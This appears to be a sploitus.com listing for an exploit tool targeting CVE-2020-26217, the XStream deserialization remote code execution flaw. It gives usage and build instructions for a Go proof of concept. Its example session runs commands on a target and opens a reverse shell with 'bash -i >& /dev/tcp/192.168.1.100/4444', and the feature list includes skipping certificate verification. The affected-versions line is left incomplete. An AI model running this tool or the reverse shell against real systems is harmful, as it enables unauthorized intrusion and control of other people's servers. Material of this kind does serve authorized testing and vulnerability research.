Share
## https://sploitus.com/exploit?id=BEDAC9E1-351C-59AB-9277-ECECAB6F3F58
# CVE-2020-26217 XStream RCE Exploit

XStream remote code execution vulnerability exploit. ## Vulnerability Description

CVE-2020-26217 is a deserialization vulnerability in the XStream library. Attackers can trigger remote code execution by constructing malicious XML data. Affected versions: XStream

## Example

```
# Run the tool
go run poc.go http://target.com:8080/?data

# Enter commands in interactive mode
cmd> whoami
cmd> cat /flag
cmd> bash -i >& /dev/tcp/192.168.1.100/4444 0>&1
cmd> exit
```

## Features

- Interactive command execution
- Automatic URL parameter name parsing
-Base64 encoding with special character filtering
- Supports HTTPS (skipping certificate verification)

## Compilation

```
bash
go build -o poc poc.go
```

## Disclaimer

This tool is intended only for security research and authorized testing purposes. Do not use it for illegal purposes. Users must bear all related legal responsibilities.